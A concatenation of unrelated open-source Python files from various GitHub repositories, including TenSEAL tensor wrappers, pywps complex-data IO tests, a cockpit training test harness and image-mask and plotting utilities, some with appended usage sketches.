configs/_base_/backends/tensorrt-fp16.py
|
zhiqwang/mmdeploy
| 746 |
104064
|
<filename>configs/_base_/backends/tensorrt-fp16.py
backend_config = dict(
type='tensorrt', common_config=dict(fp16_mode=True, max_workspace_size=0))
|
tenseal/tensors/abstract_tensor.py
|
rand0musername/TenSEAL
| 410 |
104092
|
<reponame>rand0musername/TenSEAL
"""Abstract tensor class that implements common tensor methods"""
from typing import List, Union
import tenseal as ts
from abc import ABC
class AbstractTensor(ABC):
@property
def data(self):
"""Get the wrapped low level tensor object"""
return self._data
@data.setter
def data(self, value):
"""Set the wrapped low level tensor object"""
native_type = getattr(ts._ts_cpp, self.__class__.__name__)
if not isinstance(value, native_type):
raise TypeError(f"value must be of type {native_type}")
self._data = value
def copy(self):
return self._wrap(data=self.data.copy())
def __copy__(self):
return self.copy()
def context(self) -> "ts.Context":
"""Get the context linked to this tensor"""
return ts.Context._wrap(self.data.context())
def link_context(self, ctx: "ts.Context"):
"""Set the context linked to this tensor"""
return self.data.link_context(ctx.data)
@property
def shape(self) -> List[int]:
return self.data.shape()
@classmethod
def load(cls, context: "ts.Context", data: bytes) -> "AbstractTensor":
"""
Constructor method for the tensor object from a serialized protobuffer.
Args:
context: a context, holding the encryption parameters and keys.
data: the serialized protobuffer.
Returns:
Tensor object.
"""
if isinstance(context, ts.Context) and isinstance(data, bytes):
native_type = getattr(ts._ts_cpp, cls.__name__)
return cls._wrap(native_type(context.data, data))
raise TypeError(
"Invalid input types context: {} and vector: {}".format(type(context), type(data))
)
@classmethod
def lazy_load(cls, data: bytes) -> "AbstractTensor":
"""
Constructor method for the tensor object from a serialized protobuffer, without a context.
Args:
data: the serialized protobuffer.
Returns:
Tensor object.
"""
if isinstance(data, bytes):
native_type = getattr(ts._ts_cpp, cls.__name__)
return cls._wrap(native_type(data))
raise TypeError("Invalid input types vector: {}".format(type(data)))
def serialize(self) -> bytes:
"""Serialize the tensor into a stream of bytes"""
return self.data.serialize()
@classmethod
def _wrap(cls, data) -> "AbstractTensor":
"""Return a new tensor object wrapping the low level tensor object"""
return cls(data=data)
def _decrypt(
self, secret_key: "ts.enc_context.SecretKey" = None
) -> Union[ts._ts_cpp.PlainTensorDouble, ts._ts_cpp.PlainTensorInt64, List[float], List[int]]:
if secret_key is None:
return self.data.decrypt()
elif isinstance(secret_key, ts.enc_context.SecretKey):
return self.data.decrypt(secret_key.data)
else:
raise TypeError(f"incorrect type: {type(secret_key)} != SecretKey")
@classmethod
def _get_operand(cls, other, dtype: str = "float") -> Union[int, float, "ts._ts_cpp.Tensor"]:
"""Extract the appropriate operand the tensor can operate with"""
if isinstance(other, (int, float)):
return other
elif isinstance(other, (cls, ts.PlainTensor)):
return other.data
else:
try:
other = ts.plain_tensor(other, dtype=dtype)
other = other.data
except TypeError:
raise TypeError(f"can't operate with object of type {type(other)}")
return other
def __add__(self, other) -> "AbstractTensor":
return self.add(other)
def __iadd__(self, other) -> "AbstractTensor":
return self.add_(other)
def __radd__(self, other) -> "AbstractTensor":
return self.add(other)
def __mul__(self, other) -> "AbstractTensor":
return self.mul(other)
def __imul__(self, other) -> "AbstractTensor":
return self.mul_(other)
def __rmul__(self, other) -> "AbstractTensor":
return self.mul(other)
def __sub__(self, other) -> "AbstractTensor":
return self.sub(other)
def __isub__(self, other) -> "AbstractTensor":
return self.sub_(other)
def __rsub__(self, other) -> "AbstractTensor":
copy = self.copy()
copy.neg_()
copy.add_(other)
return copy
def __pow__(self, power) -> "AbstractTensor":
return self.pow(power)
def __ipow__(self, power) -> "AbstractTensor":
return self.pow_(power)
def __neg__(self) -> "AbstractTensor":
return self.neg()
def neg(self) -> "AbstractTensor":
return self._wrap(self.data.neg())
def neg_(self) -> "AbstractTensor":
self.data.neg_()
return self
def sum(self, axis=0) -> "AbstractTensor":
return self._wrap(self.data.sum(axis))
def sum_(self, axis=0) -> "AbstractTensor":
self.data.sum_(axis)
return self
def square(self) -> "AbstractTensor":
return self._wrap(self.data.square())
def square_(self) -> "AbstractTensor":
self.data.square_()
return self
def pow(self, power) -> "AbstractTensor":
return self._wrap(self.data.pow(power))
def pow_(self, power) -> "AbstractTensor":
self.data.pow_(power)
return self
def polyval(self, coefficients: Union[List[float], List[int]]) -> "AbstractTensor":
"""Evaluate polynomial
`coefficients[0] + coefficients[1] * self + .... coefficients[n] * self ^ n`
"""
return self._wrap(self.data.polyval(coefficients))
def polyval_(self, coefficients: Union[List[float], List[int]]) -> "AbstractTensor":
self.data.polyval_(coefficients)
return self
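# --- Hedged usage sketch (not part of the original module) ---
# Why: the dunder operators and polyval above are easiest to follow from a concrete
# call sequence. What it shows: encrypt, combine with + and *, evaluate a polynomial,
# decrypt. Assumptions: ts.context, ts.SCHEME_TYPE.CKKS, global_scale, ts.ckks_tensor
# and tolist() on the decrypted plain tensor are taken from TenSEAL's public API and
# are not defined in this file; treat this as an illustrative sketch only.
if __name__ == "__main__":
    import tenseal as ts

    ctx = ts.context(
        ts.SCHEME_TYPE.CKKS,
        poly_modulus_degree=8192,
        coeff_mod_bit_sizes=[60, 40, 40, 60],
    )
    ctx.global_scale = 2 ** 40

    enc = ts.ckks_tensor(ctx, ts.plain_tensor([1.0, 2.0, 3.0]))
    combined = (enc + 1) * 2       # dispatches through __add__/__mul__ above
    poly = enc.polyval([1, 2, 3])  # 1 + 2*x + 3*x^2, evaluated homomorphically
    print(combined.decrypt().tolist())  # tolist() assumed on the returned plain tensor
    print(poly.decrypt().tolist())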
|
lib/python/frugal/tornado/transport/transport.py
|
ariasheets-wk/frugal
| 144 |
104196
|
# Copyright 2017 Workiva
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tornado import gen
from frugal.transport import FTransport
class FTransportBase(FTransport):
"""
FTransportBase extends FTransport using the coroutine decorators used by
all tornado FTransports.
"""
def is_open(self):
raise NotImplementedError("You must override this.")
@gen.coroutine
def open(self):
raise NotImplementedError("You must override this.")
@gen.coroutine
def close(self):
raise NotImplementedError("You must override this.")
@gen.coroutine
def oneway(self, context, payload):
raise NotImplementedError('You must override this.')
@gen.coroutine
def request(self, context, payload):
raise NotImplementedError('You must override this.')
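# --- Hedged sketch (not part of the original module) ---
# Why: the base class only raises NotImplementedError, so it helps to see the shape
# of a concrete override. What it shows: a toy in-memory transport filling in the
# coroutine hooks. Assumptions: the class name and loop-back behaviour are invented
# for illustration; this is not one of frugal's shipped transports.
class FInMemoryTransport(FTransportBase):
    """Toy transport that loops request payloads back to the caller."""

    def __init__(self):
        super(FInMemoryTransport, self).__init__()
        self._is_open = False

    def is_open(self):
        return self._is_open

    @gen.coroutine
    def open(self):
        self._is_open = True

    @gen.coroutine
    def close(self):
        self._is_open = False

    @gen.coroutine
    def oneway(self, context, payload):
        # a real transport would flush `payload` to the wire and return nothing
        pass

    @gen.coroutine
    def request(self, context, payload):
        # a real transport would send `payload` and wait for the server reply
        raise gen.Return(payload)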
|
gdn-master/lib/psa/modules/__init__.py
|
ldrunning/segmentation
| 1,137 |
104228
|
<reponame>ldrunning/segmentation<filename>gdn-master/lib/psa/modules/__init__.py<gh_stars>1000+
from .psamask import *
|
tests/bench/arrayop-4-bytearray_map.py
|
learnforpractice/micropython-cpp
| 692 |
104295
|
# Array operation
# Type: list, map() call. This method requires allocation of
# the same amount of memory as original array (to hold result
# array). On the other hand, input array stays intact.
import bench
def test(num):
for i in iter(range(num//10000)):
arr = bytearray(b"\0" * 1000)
arr2 = bytearray(map(lambda x: x + 1, arr))
bench.run(test)
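# --- Hedged sketch (not part of the original benchmark) ---
# Why: the header comment contrasts map() with in-place mutation. What it shows: the
# in-place variant, which mutates the original bytearray and needs no second
# allocation. Assumption: written here purely for illustration (not copied from the
# sibling in-place benchmark) and intentionally not passed to bench.run.
def test_inplace(num):
    for i in iter(range(num // 10000)):
        arr = bytearray(b"\0" * 1000)
        for j in range(len(arr)):
            arr[j] = (arr[j] + 1) & 0xFF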
|
test/strings/prefixes2.py
|
kylebarron/MagicPython
| 1,482 |
104307
|
<gh_stars>1000+
a = U'S T R'
a = B'S T R'
a = R'S T R'
a = BR'S T R'
a = RB'S T R'
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
U : source.python, storage.type.string.python, string.quoted.single.python
' : punctuation.definition.string.begin.python, source.python, string.quoted.single.python
S T R : source.python, string.quoted.single.python
' : punctuation.definition.string.end.python, source.python, string.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
B : source.python, storage.type.string.python, string.quoted.binary.single.python
' : punctuation.definition.string.begin.python, source.python, string.quoted.binary.single.python
S T R : source.python, string.quoted.binary.single.python
' : punctuation.definition.string.end.python, source.python, string.quoted.binary.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
R : source.python, storage.type.string.python, string.quoted.raw.single.python
' : punctuation.definition.string.begin.python, source.python, string.quoted.raw.single.python
S T R : source.python, string.quoted.raw.single.python
' : punctuation.definition.string.end.python, source.python, string.quoted.raw.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
BR : source.python, storage.type.string.python, string.quoted.raw.binary.single.python
' : punctuation.definition.string.begin.python, source.python, string.quoted.raw.binary.single.python
S T R : source.python, string.quoted.raw.binary.single.python
' : punctuation.definition.string.end.python, source.python, string.quoted.raw.binary.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
RB : source.python, storage.type.string.python, string.quoted.raw.binary.single.python
' : punctuation.definition.string.begin.python, source.python, string.quoted.raw.binary.single.python
S T R : source.python, string.quoted.raw.binary.single.python
' : punctuation.definition.string.end.python, source.python, string.quoted.raw.binary.single.python
|
eppy/tests/geometry_tests/test_area_zone.py
|
hnagda/eppy
| 116 |
104366
|
# Copyright (c) 2012 <NAME>
# =======================================================================
# Distributed under the MIT License.
# (See accompanying file LICENSE or copy at
# http://opensource.org/licenses/MIT)
# =======================================================================
""" pytest for area_zone.py"""
# Written by <NAME> <EMAIL> / <EMAIL>
# School of Architecture, University of Hawaii at Manoa
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import eppy.geometry.area_zone as area_zone
from eppy.pytest_helpers import almostequal
def test_area():
"""test for area of a zone"""
data = (
([(0, 0, 0), (1, 0, 1), (1, 1, 0), (0, 1, 1)], 1), # polygon, answer,
([(0, 0, 0), (1, 0, 0), (1, 0, 1), (0, 0, 1)], 0),
([(0, 0, 0), (0, 1, 0), (0, 1, 1), (0, 0, 1)], 0),
([(0, 0, 4), (5, 0, 4), (5, 5, 6), (0, 5, 6)], 25),
)
for poly, answer in data:
result = area_zone.area(poly)
        assert almostequal(answer, result, places=4)
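# --- Hedged usage sketch (not part of the original test file) ---
# Direct call showing what the loop above exercises: a 5 x 5 footprint tilted in z
# still projects to a floor area of 25. Only names already imported above are used.
def test_area_single_polygon():
    poly = [(0, 0, 4), (5, 0, 4), (5, 5, 6), (0, 5, 6)]
    assert almostequal(area_zone.area(poly), 25, places=4)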
|
CommonTools/RecoAlgos/python/LargestEtCaloJetSelector_cfi.py
|
ckamtsikis/cmssw
| 852 |
104402
|
<reponame>ckamtsikis/cmssw
import FWCore.ParameterSet.Config as cms
hltSelector4Jets = cms.EDFilter( "LargestEtCaloJetSelector",
src = cms.InputTag( "hltMCJetCorJetIcone5" ),
filter = cms.bool( False ),
maxNumber = cms.uint32( 4 )
)
|
run.py
|
0xflotus/sandman2
| 1,899 |
104420
|
<gh_stars>1000+
from sandman2 import get_app
app = get_app('sqlite+pysqlite:///tests/data/db.sqlite3')
def main():
app.run(debug=True)
if __name__ == '__main__':
main()
|
utils_cv/detection/mask.py
|
muminkoykiran/computervision-recipes
| 7,899 |
104432
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import numpy as np
from PIL import Image
from pathlib import Path
from typing import Tuple, Union
def binarise_mask(mask: Union[np.ndarray, str, Path]) -> np.ndarray:
""" Split the mask into a set of binary masks.
Assume the mask is already binary masks of [N, Height, Width], or
grayscale mask of [Height, Width] with different values
representing different objects, 0 as background.
"""
# get numpy array from image file
if isinstance(mask, (str, Path)):
mask = np.array(Image.open(mask))
# convert to numpy array
mask = np.asarray(mask)
# if it is a boolean array, consider it's already binarised
if mask.ndim == 3:
        assert np.issubdtype(mask.dtype, np.bool_), "'mask' should be binary."
return mask
    assert mask.ndim == 2, "'mask' should be a single-channel 2D array."
# remove background
obj_values = np.unique(mask)[1:]
# get the binary masks for each color (instance)
binary_masks = mask == obj_values[:, None, None]
return binary_masks
def colorise_binary_mask(
binary_mask: np.ndarray, color: Tuple[int, int, int] = (2, 166, 101)
) -> np.ndarray:
""" Set the color for the instance in the mask. """
# create empty RGB channels
h = binary_mask.shape[0]
w = binary_mask.shape[1]
r, g, b = np.zeros([3, h, w]).astype(np.uint8)
# set corresponding color for each channel
r[binary_mask], g[binary_mask], b[binary_mask] = color
# merge RGB channels
colored_mask = np.dstack([r, g, b])
return colored_mask
def transparentise_mask(
colored_mask: np.ndarray, alpha: float = 0.5
) -> np.ndarray:
""" Return a mask with fully transparent background and alpha-transparent
instances.
Assume channel is the third dimension of mask, and no alpha channel.
"""
assert (
colored_mask.shape[2] == 3
), "'colored_mask' should be of 3-channels RGB."
# convert (0, 0, 0) to (0, 0, 0, 0) and
# all other (x, y, z) to (x, y, z, alpha*255)
binary_mask = (colored_mask != 0).any(axis=2)
alpha_mask = (alpha * 255 * binary_mask).astype(np.uint8)
return np.dstack([colored_mask, alpha_mask])
def merge_binary_masks(binary_masks: np.ndarray) -> np.ndarray:
""" Merge binary masks into one grayscale mask.
Assume binary_masks is of [N, Height, Width].
"""
obj_values = np.arange(len(binary_masks)) + 1
# label mask from 1 to number of instances
labeled_masks = binary_masks * obj_values[:, None, None]
return np.max(labeled_masks, axis=0).astype(np.uint8)
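# --- Hedged usage sketch (not part of the original module) ---
# Why: a round trip through the helpers above makes their contracts concrete. What it
# shows: a tiny synthetic grayscale mask with two instances (labels 1 and 2) split
# into binary masks, colorised, made transparent, and merged back to the same labels.
# Only functions defined in this file plus numpy are used.
if __name__ == "__main__":
    toy_mask = np.array(
        [[0, 1, 1],
         [0, 2, 2],
         [0, 0, 2]],
        dtype=np.uint8,
    )
    binary_masks = binarise_mask(toy_mask)           # shape (2, 3, 3), boolean
    colored = colorise_binary_mask(binary_masks[0])  # RGB image for instance 1
    rgba = transparentise_mask(colored, alpha=0.5)   # add an alpha channel
    merged = merge_binary_masks(binary_masks)        # back to labels 1..N
    assert merged.shape == toy_mask.shape
    assert (merged == toy_mask).all()
    print(binary_masks.shape, colored.shape, rgba.shape)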
|
aries_cloudagent/protocols/issue_credential/v2_0/models/detail/tests/test_indy.py
|
kuraakhilesh8230/aries-cloudagent-python
| 247 |
104449
|
<reponame>kuraakhilesh8230/aries-cloudagent-python
from asynctest import TestCase as AsyncTestCase
from ..indy import V20CredExRecordIndy
class TestV20CredExRecordIndy(AsyncTestCase):
async def test_record(self):
same = [
V20CredExRecordIndy(
cred_ex_indy_id="dummy-0",
cred_ex_id="abc",
cred_request_metadata={"a": 1, "b": 2},
rev_reg_id=None,
cred_rev_id=None,
)
] * 2
diff = [
V20CredExRecordIndy(
cred_ex_indy_id="dummy-1",
cred_ex_id="def",
cred_request_metadata={"a": 1, "b": 2},
rev_reg_id=None,
cred_rev_id=None,
),
V20CredExRecordIndy(
cred_ex_indy_id="dummy-1",
cred_ex_id="ghi",
cred_request_metadata={"a": 1, "b": 2},
rev_reg_id=None,
cred_rev_id=None,
),
V20CredExRecordIndy(
cred_ex_indy_id="dummy-1",
cred_ex_id="def",
cred_request_metadata={"a": 1, "b": 2},
rev_reg_id="rev-reg-id",
cred_rev_id="cred-rev-id",
),
]
for i in range(len(same) - 1):
for j in range(i, len(same)):
assert same[i] == same[j]
for i in range(len(diff) - 1):
for j in range(i, len(diff)):
assert diff[i] == diff[j] if i == j else diff[i] != diff[j]
assert same[0].cred_ex_indy_id == "dummy-0"
|
alipay/aop/api/response/AlipayOverseasTravelRateCurrencyBatchqueryResponse.py
|
antopen/alipay-sdk-python-all
| 213 |
104469
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.RateCurrency import RateCurrency
class AlipayOverseasTravelRateCurrencyBatchqueryResponse(AlipayResponse):
def __init__(self):
super(AlipayOverseasTravelRateCurrencyBatchqueryResponse, self).__init__()
self._currency_list = None
@property
def currency_list(self):
return self._currency_list
@currency_list.setter
def currency_list(self, value):
if isinstance(value, list):
self._currency_list = list()
for i in value:
if isinstance(i, RateCurrency):
self._currency_list.append(i)
else:
self._currency_list.append(RateCurrency.from_alipay_dict(i))
def parse_response_content(self, response_content):
response = super(AlipayOverseasTravelRateCurrencyBatchqueryResponse, self).parse_response_content(response_content)
if 'currency_list' in response:
self.currency_list = response['currency_list']
|
tests/utils/harness.py
|
wx-b/cockpit
| 367 |
104543
|
<reponame>wx-b/cockpit<gh_stars>100-1000
"""Base class for executing and hooking into a training loop to execute checks."""
from backpack import extend
from cockpit import Cockpit
from tests.utils.rand import restore_rng_state
class SimpleTestHarness:
"""Class for running a simple test loop with the Cockpit.
Args:
        problem: The instantiated problem object to test on.
"""
def __init__(self, problem):
"""Store the instantiated problem."""
self.problem = problem
def test(self, cockpit_kwargs, *backpack_exts):
"""Run the test loop.
Args:
cockpit_kwargs (dict): Arguments for the cockpit.
*backpack_exts (list): List of user-defined BackPACK extensions.
"""
problem = self.problem
data = problem.data
device = problem.device
iterations = problem.iterations
# Extend
model = extend(problem.model)
loss_fn = extend(problem.loss_function)
individual_loss_fn = extend(problem.individual_loss_function)
# Create Optimizer
optimizer = problem.optimizer
# Initialize Cockpit
self.cockpit = Cockpit(model.parameters(), **cockpit_kwargs)
# Main training loop
global_step = 0
for inputs, labels in iter(data):
inputs, labels = inputs.to(device), labels.to(device)
optimizer.zero_grad()
# forward pass
outputs = model(inputs)
loss = loss_fn(outputs, labels)
losses = individual_loss_fn(outputs, labels)
# code inside this block does not alter random number generation
with restore_rng_state():
# backward pass
with self.cockpit(
global_step,
*backpack_exts,
info={
"batch_size": inputs.shape[0],
"individual_losses": losses,
"loss": loss,
"optimizer": optimizer,
},
):
loss.backward(create_graph=self.cockpit.create_graph(global_step))
self.check_in_context()
self.check_after_context()
# optimizer step
optimizer.step()
global_step += 1
if global_step >= iterations:
break
def check_in_context(self):
"""Check that will be executed within the cockpit context."""
pass
def check_after_context(self):
"""Check that will be executed directly after the cockpit context."""
pass
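# --- Hedged sketch (not part of the original module) ---
# Why: the two check_* hooks above are no-ops, so a concrete subclass shows how a
# test plugs in. Assumption: Cockpit.get_output() returning the tracked-quantity
# dict is taken from cockpit's public API; the check itself is illustrative only.
class NonEmptyOutputHarness(SimpleTestHarness):
    """Harness that asserts the cockpit produced some tracked output."""

    def check_after_context(self):
        output = self.cockpit.get_output()
        assert isinstance(output, dict)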
|
tests/test_complexdata_io.py
|
geotom/pywps
| 117 |
104561
|
"""Test embedding different file formats and different encodings within the <Data> tag."""
import unittest
import os
from pywps import get_ElementMakerForVersion
from pywps.app.basic import get_xpath_ns
from pywps import Service, Process, ComplexInput, ComplexOutput, FORMATS
from pywps.tests import client_for, assert_response_success
from owslib.wps import WPSExecution, ComplexDataInput
from pywps import xml_util as etree
VERSION = "1.0.0"
WPS, OWS = get_ElementMakerForVersion(VERSION)
xpath_ns = get_xpath_ns(VERSION)
def get_resource(path):
return os.path.join(os.path.abspath(os.path.dirname(__file__)), 'data', path)
test_fmts = {'json': (get_resource('json/point.geojson'), FORMATS.JSON),
'geojson': (get_resource('json/point.geojson'), FORMATS.GEOJSON),
'netcdf': (get_resource('netcdf/time.nc'), FORMATS.NETCDF),
'geotiff': (get_resource('geotiff/dem.tiff'), FORMATS.GEOTIFF),
'gml': (get_resource('gml/point.gml'), FORMATS.GML),
'shp': (get_resource('shp/point.shp.zip'), FORMATS.SHP),
'txt': (get_resource('text/unsafe.txt'), FORMATS.TEXT),
}
def create_fmt_process(name, fn, fmt):
"""Create a dummy process comparing the input file on disk and the data that was passed in the request."""
def handler(request, response):
# Load output from file and convert to data
response.outputs['complex'].file = fn
o = response.outputs['complex'].data
# Get input data from the request
i = request.inputs['complex'][0].data
assert i == o
return response
return Process(handler=handler,
identifier='test-fmt',
title='Complex fmt test process',
inputs=[ComplexInput('complex', 'Complex input',
supported_formats=(fmt, ))],
outputs=[ComplexOutput('complex', 'Complex output',
supported_formats=(fmt, ))])
def get_data(fn, encoding=None):
"""Read the data from file and encode."""
import base64
mode = 'rb' if encoding == 'base64' else 'r'
with open(fn, mode) as fp:
data = fp.read()
if encoding == 'base64':
data = base64.b64encode(data)
if isinstance(data, bytes):
return data.decode('utf-8')
else:
return data
class RawInput(unittest.TestCase):
def make_request(self, name, fn, fmt):
"""Create XML request embedding encoded data."""
data = get_data(fn, fmt.encoding)
doc = WPS.Execute(
OWS.Identifier('test-fmt'),
WPS.DataInputs(
WPS.Input(
OWS.Identifier('complex'),
WPS.Data(
WPS.ComplexData(data, mimeType=fmt.mime_type, encoding=fmt.encoding)))),
version='1.0.0')
return doc
def compare_io(self, name, fn, fmt):
"""Start the dummy process, post the request and check the response matches the input data."""
# Note that `WPSRequest` calls `get_inputs_from_xml` which converts base64 input to bytes
# See `_get_rawvalue_value`
client = client_for(Service(processes=[create_fmt_process(name, fn, fmt)]))
data = get_data(fn, fmt.encoding)
wps = WPSExecution()
doc = wps.buildRequest('test-fmt',
inputs=[('complex', ComplexDataInput(data, mimeType=fmt.mime_type,
encoding=fmt.encoding))],
mode='sync')
resp = client.post_xml(doc=doc)
assert_response_success(resp)
wps.parseResponse(resp.xml)
out = wps.processOutputs[0].data[0]
if 'gml' in fmt.mime_type:
xml_orig = etree.tostring(etree.fromstring(data.encode('utf-8'))).decode('utf-8')
xml_out = etree.tostring(etree.fromstring(out.decode('utf-8'))).decode('utf-8')
# Not equal because the output includes additional namespaces compared to the origin.
# self.assertEqual(xml_out, xml_orig)
else:
self.assertEqual(out.strip(), data.strip())
def test_json(self):
key = 'json'
self.compare_io(key, *test_fmts[key])
def test_geojson(self):
key = 'geojson'
self.compare_io(key, *test_fmts[key])
def test_geotiff(self):
key = 'geotiff'
self.compare_io(key, *test_fmts[key])
def test_netcdf(self):
key = 'netcdf'
self.compare_io(key, *test_fmts[key])
def test_gml(self):
key = 'gml'
self.compare_io(key, *test_fmts[key])
def test_shp(self):
key = 'shp'
self.compare_io(key, *test_fmts[key])
def test_txt(self):
key = 'txt'
self.compare_io(key, *test_fmts[key])
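# --- Hedged usage sketch (not part of the original tests) ---
# Why: shows how the helpers above compose outside the unittest runner. What it does:
# build a raw Execute document via make_request for one fixture, post it to an
# in-process client, and check the response. Assumption: only names defined or
# imported above are used; the function itself is illustrative.
def manual_roundtrip(key='json'):
    fn, fmt = test_fmts[key]
    client = client_for(Service(processes=[create_fmt_process(key, fn, fmt)]))
    doc = RawInput('compare_io').make_request(key, fn, fmt)
    resp = client.post_xml(doc=doc)
    assert_response_success(resp)
    return resp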
|
notebooks/utils.py
|
xuzhuang1996/hierarchical_loc
| 143 |
104575
|
import matplotlib.pyplot as plt
import cv2
import numpy as np
def plot_imgs(imgs, titles=None, cmap='brg', ylabel='', normalize=True, ax=None,
r=(0, 1), dpi=100):
n = len(imgs)
if not isinstance(cmap, list):
cmap = [cmap]*n
if ax is None:
_, ax = plt.subplots(1, n, figsize=(6*n, 6), dpi=dpi)
if n == 1:
ax = [ax]
else:
if not isinstance(ax, list):
ax = [ax]
assert len(ax) == len(imgs)
for i in range(n):
if len(imgs[i].shape) == 3:
if imgs[i].shape[-1] == 3:
imgs[i] = imgs[i][..., ::-1] # BGR to RGB
elif imgs[i].shape[-1] == 1:
imgs[i] = imgs[i][..., 0]
if len(imgs[i].shape) == 2 and cmap[i] == 'brg':
cmap[i] = 'gray'
ax[i].imshow(imgs[i], cmap=plt.get_cmap(cmap[i]),
vmin=None if normalize else r[0],
vmax=None if normalize else r[1])
if titles:
ax[i].set_title(titles[i])
ax[i].get_yaxis().set_ticks([])
ax[i].get_xaxis().set_ticks([])
for spine in ax[i].spines.values(): # remove frame
spine.set_visible(False)
ax[0].set_ylabel(ylabel)
plt.tight_layout()
def draw_datches(img1, kp1, img2, kp2, matches, color=None, kp_radius=5,
thickness=2, margin=20):
# Create frame
if len(img1.shape) == 3:
new_shape = (max(img1.shape[0], img2.shape[0]),
img1.shape[1]+img2.shape[1]+margin,
img1.shape[2])
elif len(img1.shape) == 2:
new_shape = (max(img1.shape[0],
img2.shape[0]),
img1.shape[1]+img2.shape[1]+margin)
new_img = np.ones(new_shape, type(img1.flat[0]))*255
# Place original images
new_img[0:img1.shape[0], 0:img1.shape[1]] = img1
new_img[0:img2.shape[0],
img1.shape[1]+margin:img1.shape[1]+img2.shape[1]+margin] = img2
# Draw lines between matches
if color:
c = color
for m in matches:
# Generate random color for RGB/BGR and grayscale images as needed.
        if not color:
            if len(img1.shape) == 3:
                c = tuple(int(v) for v in np.random.randint(0, 256, 3))
            else:
                # scalar intensity for grayscale frames; indexing c[0] here would fail
                c = int(np.random.randint(0, 256))
end1 = tuple(np.round(kp1[m.trainIdx].pt).astype(int))
end2 = tuple(np.round(kp2[m.queryIdx].pt).astype(int)
+ np.array([img1.shape[1]+margin, 0]))
cv2.line(new_img, end1, end2, c, thickness, lineType=cv2.LINE_AA)
cv2.circle(new_img, end1, kp_radius, c, thickness, lineType=cv2.LINE_AA)
cv2.circle(new_img, end2, kp_radius, c, thickness, lineType=cv2.LINE_AA)
return new_img
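# --- Hedged usage sketch (not part of the original module) ---
# Why: shows how the two helpers above are typically combined in a notebook.
# Assumptions: the image paths are placeholders, and ORB + brute-force Hamming
# matching is just one way to obtain keypoints/matches; the matcher is queried with
# (des2, des1) so that queryIdx indexes kp2 and trainIdx indexes kp1, matching how
# draw_datches uses them.
if __name__ == "__main__":
    img1 = cv2.imread('query.png')      # placeholder path
    img2 = cv2.imread('reference.png')  # placeholder path
    plot_imgs([img1, img2], titles=['query', 'reference'], ylabel='pair 0')

    orb = cv2.ORB_create(1000)
    kp1, des1 = orb.detectAndCompute(img1, None)
    kp2, des2 = orb.detectAndCompute(img2, None)
    matches = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True).match(des2, des1)
    vis = draw_datches(img1, kp1, img2, kp2, matches)
    plt.figure(dpi=100)
    plt.imshow(vis[..., ::-1])  # BGR composite to RGB for matplotlib
    plt.show()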
|